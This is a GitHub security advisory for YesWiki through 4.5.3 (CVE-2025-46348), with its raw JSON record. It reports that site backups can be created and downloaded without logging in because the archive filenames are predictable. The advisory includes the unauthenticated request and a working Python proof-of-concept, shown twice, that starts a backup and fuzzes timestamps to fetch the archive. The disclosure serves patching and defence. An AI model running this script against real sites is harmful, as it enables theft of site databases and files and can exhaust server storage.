ghsa-wc9g-6j9w-hr95
Vulnerability from github
Published
2025-04-29 14:41
Modified
2025-04-29 14:41
Severity ?
Summary
YesWiki Vulnerable to Unauthenticated Site Backup Creation and Download
Details

Summary

The request to commence a site backup can be performed without authentication. Then these backups can also be downloaded without authentication.

The archives are created with a predictable filename, so a malicious user could create an archive and then download the archive without being authenticated.

Details

Create an installation using the instructions found in the docker folder of the repository, setup the site, and then send the request to create an archive, which you do not need to be authenticated for:

``` POST /?api/archives HTTP/1.1 Host: localhost:8085

action=startArchive&params%5Bsavefiles%5D=true&params%5Bsavedatabase%5D=true&callAsync=true Then to retrieve it, make a simple `GET` request like to the correct URL: http://localhost:8085/?api/archives/2025-04-12T14-34-01_archive.zip ``` A malicious attacker could simply fuzz this filename.

PoC

Here is a python script to fuzz this:

```

!/usr/bin/env python3

import requests import argparse import datetime import time from urllib.parse import urljoin from email.utils import parsedate_to_datetime import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

Hardcoded proxy config for Burp Suite

BURP_PROXIES = { "http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080" }

def send_post_request(base_url, use_proxy=False): url = urljoin(base_url, "/?api/archives") headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36", }

data = {
    "action": "startArchive",
    "params[savefiles]": "true",
    "params[savedatabase]": "true",
    "callAsync": "true"
}

proxies = BURP_PROXIES if use_proxy else None
response = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)
print(f"[+] Archive start response code: {response.status_code}")

server_date = response.headers.get("Date")
if server_date:
    ts = parsedate_to_datetime(server_date)
    print(f"[✓] Server time (from Date header): {ts.strftime('%Y-%m-%d %H:%M:%S')} UTC")
    return ts
else:
    print("[!] Server did not return a Date header, falling back to local UTC.")
    return datetime.datetime.utcnow()

def try_download_files(base_url, timestamp, use_proxy=False): headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36", }

proxies = BURP_PROXIES if use_proxy else None
print("[*] Trying to download the archive with timestamp fuzzing (±10 seconds)...")

base_ts = timestamp + datetime.timedelta(hours=2)

time.sleep(30)  # delay to generate the archive

for offset in range(-4, 15):
    ts = base_ts + datetime.timedelta(seconds=offset)
    filename = ts.strftime("%Y-%m-%dT%H-%M-%S_archive.zip")
    url = urljoin(base_url, f"/?api/archives/{filename}")
    print(f"[>] Trying: {url}")
    r = requests.get(url, headers=headers, proxies=proxies, verify=False)

    if r.status_code == 200 and r.headers.get("Content-Type", "").startswith("application/zip"):
        print(f"[✓] Archive found and downloaded: {filename}")
        with open(filename, "wb") as f:
            f.write(r.content)
        return

print("[!] No archive found within the fuzzed window.")

if name == "main": parser = argparse.ArgumentParser(description="Trigger archive and fetch resulting file with timestamp fuzzing.") parser.add_argument("host", help="Base host URL, e.g., http://localhost:8085") parser.add_argument("-p", "--proxy", action="store_true", help="Route requests through Burp Suite proxy at 127.0.0.1:8080") args = parser.parse_args()

ts = send_post_request(args.host, use_proxy=args.proxy)
print(f"[+] Archive request sent at (UTC): {ts.strftime('%Y-%m-%d %H:%M:%S')}")

try_download_files(args.host, ts, use_proxy=args.proxy)

```

Impact

Denial of Service - A malicious attacker could simply make numerous requests to create archives and fill up the file system with archives.

Site Compromise - A malicious attacker can download the archive which will contain sensitive site information.

Show details on source website


{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.5.3"
      },
      "package": {
        "ecosystem": "Packagist",
        "name": "yeswiki/yeswiki"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.5.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-46348"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-287",
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-04-29T14:41:31Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nThe request to commence a site backup can be performed without authentication. Then these backups can also be downloaded without authentication. \n\nThe archives are created with a predictable filename, so a malicious user could create an archive and then download the archive without being authenticated. \n\n### Details\n\nCreate an installation using the instructions found in the docker folder of the repository, setup the site, and then send the request to create an archive, which you do not need to be authenticated for: \n\n```\nPOST /?api/archives HTTP/1.1\nHost: localhost:8085\n\naction=startArchive\u0026params%5Bsavefiles%5D=true\u0026params%5Bsavedatabase%5D=true\u0026callAsync=true\n```\nThen to retrieve it, make a simple `GET` request like to the correct URL: \n```\nhttp://localhost:8085/?api/archives/2025-04-12T14-34-01_archive.zip\n```\nA malicious attacker could simply fuzz this filename.\n\n### PoC\nHere is a python script to fuzz this: \n\n```\n#!/usr/bin/env python3\n\nimport requests\nimport argparse\nimport datetime\nimport time\nfrom urllib.parse import urljoin\nfrom email.utils import parsedate_to_datetime\nimport urllib3\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n# Hardcoded proxy config for Burp Suite\nBURP_PROXIES = {\n    \"http\": \"http://127.0.0.1:8080\",\n    \"https\": \"http://127.0.0.1:8080\"\n}\n\ndef send_post_request(base_url, use_proxy=False):\n    url = urljoin(base_url, \"/?api/archives\")\n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36\",\n    }\n\n    data = {\n        \"action\": \"startArchive\",\n        \"params[savefiles]\": \"true\",\n        \"params[savedatabase]\": \"true\",\n        \"callAsync\": \"true\"\n    }\n\n    proxies = BURP_PROXIES if use_proxy else None\n    response = requests.post(url, headers=headers, data=data, proxies=proxies, verify=False)\n    print(f\"[+] Archive start response code: {response.status_code}\")\n\n    server_date = response.headers.get(\"Date\")\n    if server_date:\n        ts = parsedate_to_datetime(server_date)\n        print(f\"[\u2713] Server time (from Date header): {ts.strftime(\u0027%Y-%m-%d %H:%M:%S\u0027)} UTC\")\n        return ts\n    else:\n        print(\"[!] Server did not return a Date header, falling back to local UTC.\")\n        return datetime.datetime.utcnow()\n\ndef try_download_files(base_url, timestamp, use_proxy=False):\n    headers = {\n        \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36\",\n    }\n\n    proxies = BURP_PROXIES if use_proxy else None\n    print(\"[*] Trying to download the archive with timestamp fuzzing (\u00b110 seconds)...\")\n\n    base_ts = timestamp + datetime.timedelta(hours=2)\n\n    time.sleep(30)  # delay to generate the archive\n\n    for offset in range(-4, 15):\n        ts = base_ts + datetime.timedelta(seconds=offset)\n        filename = ts.strftime(\"%Y-%m-%dT%H-%M-%S_archive.zip\")\n        url = urljoin(base_url, f\"/?api/archives/{filename}\")\n        print(f\"[\u003e] Trying: {url}\")\n        r = requests.get(url, headers=headers, proxies=proxies, verify=False)\n\n        if r.status_code == 200 and r.headers.get(\"Content-Type\", \"\").startswith(\"application/zip\"):\n            print(f\"[\u2713] Archive found and downloaded: {filename}\")\n            with open(filename, \"wb\") as f:\n                f.write(r.content)\n            return\n\n    print(\"[!] No archive found within the fuzzed window.\")\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(description=\"Trigger archive and fetch resulting file with timestamp fuzzing.\")\n    parser.add_argument(\"host\", help=\"Base host URL, e.g., http://localhost:8085\")\n    parser.add_argument(\"-p\", \"--proxy\", action=\"store_true\", help=\"Route requests through Burp Suite proxy at 127.0.0.1:8080\")\n    args = parser.parse_args()\n\n    ts = send_post_request(args.host, use_proxy=args.proxy)\n    print(f\"[+] Archive request sent at (UTC): {ts.strftime(\u0027%Y-%m-%d %H:%M:%S\u0027)}\")\n\n    try_download_files(args.host, ts, use_proxy=args.proxy)\n```\n\n### Impact\n\nDenial of Service - A malicious attacker could simply make numerous requests to create archives and fill up the file system with archives. \n\nSite Compromise - A malicious attacker can download the archive which will contain sensitive site information.",
  "id": "GHSA-wc9g-6j9w-hr95",
  "modified": "2025-04-29T14:41:31Z",
  "published": "2025-04-29T14:41:31Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/YesWiki/yeswiki/security/advisories/GHSA-wc9g-6j9w-hr95"
    },
    {
      "type": "WEB",
      "url": "https://github.com/YesWiki/yeswiki/commit/0d4efc880a727599fa4f6d7a64cc967afe475530"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/YesWiki/yeswiki"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "YesWiki Vulnerable to Unauthenticated Site Backup Creation and Download"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading...

Loading...

Loading...
  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.